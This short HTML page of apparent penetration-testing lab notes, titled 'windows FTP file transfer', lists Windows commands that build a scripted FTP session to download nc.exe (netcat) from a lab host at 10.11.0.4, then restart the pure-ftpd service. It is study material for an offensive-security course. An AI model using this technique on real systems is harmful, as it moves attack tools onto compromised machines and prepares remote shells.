<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>windows FTP file transfer</title>
</head><body>C:\Users\offsec&gt;echo open 10.11.0.4 21&gt; ftp.txt <br/>
C:\Users\offsec&gt;echo USER offsec&gt;&gt; ftp.txt <br/>
C:\Users\offsec&gt;echo lab&gt;&gt; ftp.txt <br/>
C:\Users\offsec&gt;echo bin &gt;&gt; ftp.txt <br/>
C:\Users\offsec&gt;echo GET nc.exe &gt;&gt; ftp.txt <br/>
C:\Users\offsec&gt;echo bye &gt;&gt; ftp.txt <br/>
<br/>
ftp -v -n -s:ftp.txt <br/>
<br/>
&nbsp;sudo systemctl restart pure-ftpd</body></html>